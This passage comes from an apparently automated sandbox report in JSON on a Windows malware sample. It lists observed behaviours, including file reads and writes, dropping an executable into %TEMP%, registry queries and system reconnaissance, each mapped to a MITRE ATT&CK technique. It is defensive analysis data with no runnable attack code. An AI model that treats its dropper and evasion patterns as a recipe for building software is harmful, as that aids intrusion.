"Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" reads file \"c:\\10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\DIAGNOSTICS\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"085cda53603755dc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\version.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\Documents\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\ui\\SwDRM.dll\"\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" writes file \"%temp%\\085cda53603755dc.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004308]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"085cda53603755dc.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"10D28B395CF72D1CAAE9CBCF589638FD4D11710B08F435872BB913AF80BDE32E\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00005500)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" queries volume information of \"C:\\\" at 00000000-00005884-0000010C-174140\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005500-0000010C-973198\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004308-0000010C-2488661", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005500)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" queries volume information of \"C:\\\" at 00000000-00005884-0000010C-174140\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005500-0000010C-973198\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00004308-0000010C-2488661", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006a0098836a0093836a00000000000000000000006700000000019cdd22000000000000eb220095e1e2764c210700feffffff435ce6765059e676aa000000b800000092836a0090836a0024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5ce57660d8fe74ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ede676ba836a00a06abc748600000024df22005ce322000000000086008800a06abc7424df2200916cbc74ba836a00a06abc74a06abc7494e3220002020000 (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005884)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006e00e8dd6e00e3dd6e00000000000000000000006b00000000019cdc22000000000000ea220095e1e276f72b0700feffffff435ce6765059e676aa000000b8000000e2dd6e00e0dd6e0024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5ce57660d8fe74ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ede6760ade6e00a06abc748600000024de22005ce222000000000086008800a06abc7424de2200916cbc740ade6e00a06abc74a06abc7494e2220002020000 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00e776d600e7766bccc37670000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00005500)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004308)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005500)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005884)\n \"10d28b395cf72d1caae9cbcf589638fd4d11710b08f435872bb913af80bde32e.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005884)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": 